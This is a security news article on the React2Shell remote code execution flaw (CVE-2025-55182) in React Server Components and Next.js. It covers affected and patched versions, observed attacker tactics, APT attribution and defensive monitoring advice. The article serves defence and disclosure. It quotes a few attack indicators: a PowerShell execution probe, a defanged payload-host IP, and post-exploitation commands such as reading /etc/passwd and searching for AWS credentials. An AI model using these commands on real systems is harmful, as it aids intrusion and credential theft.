The critical React2Shell vulnerability (CVE-2025-55182) in the React ecosystem has moved from a theoretical risk to large‑scale, real‑world exploitation. Within hours of public disclosure, active attacks were observed against production systems, with researchers estimating that more than 30 organizations have already been compromised and over 77,000 servers worldwide remain potentially exposed.
What Is React2Shell (CVE-2025-55182) and Why It Is So Dangerous
React2Shell is a remote code execution (RCE) vulnerability in React Server Components (RSC). It has been assigned a CVSS score of 10.0, the maximum possible rating, indicating a critical impact on confidentiality, integrity, and availability of affected servers.
The root cause is unsafe deserialization of untrusted data on the server side. By sending a specially crafted HTTP request, an attacker can trigger deserialization logic that allows execution of arbitrary code on the server. The attack does not require authentication, elevated privileges, or user interaction, which significantly lowers the bar for exploitation and enables mass scanning and automated attacks.
The vulnerability affects default configurations of React 19.0, 19.1.0, 19.1.1, and 19.2.0, as well as applications built on Next.js that rely on React Server Components. Security fixes are available in React 19.0.1, 19.1.2, 19.2.1 and in updated Next.js releases, which eliminate the unsafe deserialization path.
Researchers warn that similar design flaws may exist in other server‑side React implementations and related tooling, including Vite RSC plugin, Parcel RSC plugin, React Router RSC preview, RedwoodSDK, and Waku. This broadens the potential blast radius of React2Shell across the wider JavaScript and Node.js ecosystem, especially in cloud‑native and microservices‑based architectures.
Scope of Exposure and Early Attack Activity
According to data from the Shadowserver Foundation, scans have identified 76,664 unique IP addresses on the public internet that appear vulnerable to React2Shell, including approximately 3,000 exposed hosts in Russia. Detection relied on techniques described by researchers from Searchlight Cyber and Assetnote, where servers are probed with crafted HTTP requests and the structure of the response is used to infer the presence of the vulnerable React Server Components behavior.
In parallel, security teams at Rapid7 and Elastic Security have confirmed the availability of working proof‑of‑concept (PoC) exploits in public repositories. Threat intelligence provider GreyNoise has already observed attempts to exploit React2Shell from 181 unique IP addresses. Most of this traffic is automated and originates from infrastructure in the Netherlands, China, the United States, Hong Kong, and several other regions, consistent with large‑scale opportunistic scanning campaigns.
Attacker Tactics: From Reconnaissance to Persistent Access
Incident reports show a repeatable pattern in how adversaries are weaponizing CVE-2025-55182. In the initial phase, attackers typically execute simple PowerShell commands to verify whether remote code execution is possible. A common example is a command such as powershell -c "40138*41979", which computes a predictable numeric result while leaving only minimal and often overlooked traces in logs.
Once execution is confirmed, attackers escalate to more sophisticated payloads, often using base64‑encoded PowerShell commands to evade naive detection signatures. Additional scripts are downloaded directly into memory, avoiding writes to disk and thereby bypassing many traditional antivirus and endpoint detection controls. In one documented case, payloads were retrieved from the IP address 23[.]235[.]188[.]3, with the scripts loaded and executed entirely in RAM.
These scripts commonly attempt to disable the Antimalware Scan Interface (AMSI), a Windows security feature that inspects scripts before execution. By turning off or tampering with AMSI, attackers can run obfuscated PowerShell code and post‑exploitation tooling with reduced likelihood of detection, then proceed to deploy subsequent stages of the intrusion.
Samples analyzed via VirusTotal indicate that some of these payloads install a Cobalt Strike beacon on compromised hosts. Although Cobalt Strike is a legitimate penetration testing platform, it is widely abused by threat actors to maintain long‑term persistence, issue remote commands, move laterally across networks, and coordinate follow‑on actions such as data theft or ransomware deployment.
APT Involvement and Focus on Cloud Infrastructure
The security team at Amazon Web Services (AWS) reports that attempts to exploit React2Shell began within hours of the initial disclosure. Part of this activity has been traced back to infrastructure previously associated with China‑linked advanced persistent threat (APT) groups, including Earth Lamia and Jackpot Panda, suggesting that both state‑aligned and criminal actors are racing to weaponize the vulnerability.
Researchers at Palo Alto Networks estimate that more than 30 organizations have already been affected. On compromised servers, attackers are observed running commands such as whoami and id, reading /etc/passwd, attempting to write files, and aggressively searching for AWS configuration files and credentials. This behavior is consistent with efforts to expand access into cloud control planes and associated services.
Some attack clusters have been linked to the government‑associated group UNC5174 (also tracked as CL‑STA‑1015). In victim environments, analysts have identified the presence of tools such as Snowlight, a dropper used to deliver additional malicious payloads, and Vshell, a backdoor that provides remote access, post‑exploitation capabilities, and lateral movement. These tools and techniques align with previously documented UNC5174 tradecraft.
Regulatory Response and Impact on Global Service Providers
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2025-55182 to its Known Exploited Vulnerabilities (KEV) catalog. Inclusion in KEV means the vulnerability is confirmed as being actively exploited in the wild and is considered a priority for remediation. U.S. federal agencies have been mandated to apply relevant patches no later than 26 December 2025, underscoring the urgency and seriousness of the issue.
React2Shell has also had indirect effects on major internet infrastructure. During the rapid rollout of new web application firewall (WAF) rules to mitigate this vulnerability, Cloudflare encountered an internal error that temporarily affected around 28% of all HTTP traffic traversing its network. While this incident was not the result of a cyberattack, it highlights how a single critical software flaw can trigger far‑reaching operational responses and cascading impacts across global platforms.
How Organizations Should Respond to the React2Shell Threat
Organizations running React Server Components, Next.js, or related RSC tooling should treat React2Shell as an immediate incident‑level risk. The first priority is to apply all available security updates for React and Next.js, and to verify that build pipelines, containers, and server images are using the patched versions (React 19.0.1, 19.1.2, 19.2.1 and corresponding fixed Next.js releases). An accurate inventory of internet‑exposed services, ideally supported by asset discovery tools and software bills of materials (SBOMs), is critical to ensure no vulnerable endpoints are overlooked.
Security monitoring should be hardened around PowerShell activity, script execution, and outbound network connections. Recommended measures include enabling advanced PowerShell logging (module, script block, and transcription), alerting on base64‑encoded commands, detection of AMSI tampering, and inspection of suspicious connections to previously unseen IP addresses or domains. Environments should be proactively scanned for signs of Cobalt Strike beacons, Vshell, and Snowlight, as well as anomalous usage of system utilities and cloud management tools.
Given the confirmed exploitation by advanced threat actors, organizations are advised to conduct retrospective log reviews from the date of public disclosure of React2Shell, looking for telltale command patterns (whoami, id, cat /etc/passwd, unexpected PowerShell execution), unusual process trees, and configuration file access. Where compromise is suspected, incident response actions should include account and credential rotation, particularly for AWS IAM users, roles, and access keys, and a review of cloud audit logs (such as AWS CloudTrail) for unauthorized administrative operations.
React2Shell illustrates how a single flaw in a widely used web framework can rapidly translate into a broad attack surface for both opportunistic and targeted adversaries. Organizations that depend on React, Next.js, and modern JavaScript tooling should not only patch aggressively, but also invest in secure coding practices that avoid unsafe deserialization patterns, perform regular code reviews and threat modeling, and maintain a mature vulnerability management process. The speed and scale of exploitation around CVE-2025-55182 make clear that early patching, continuous monitoring, and disciplined cloud security hygiene are now essential prerequisites for operating modern web applications safely.
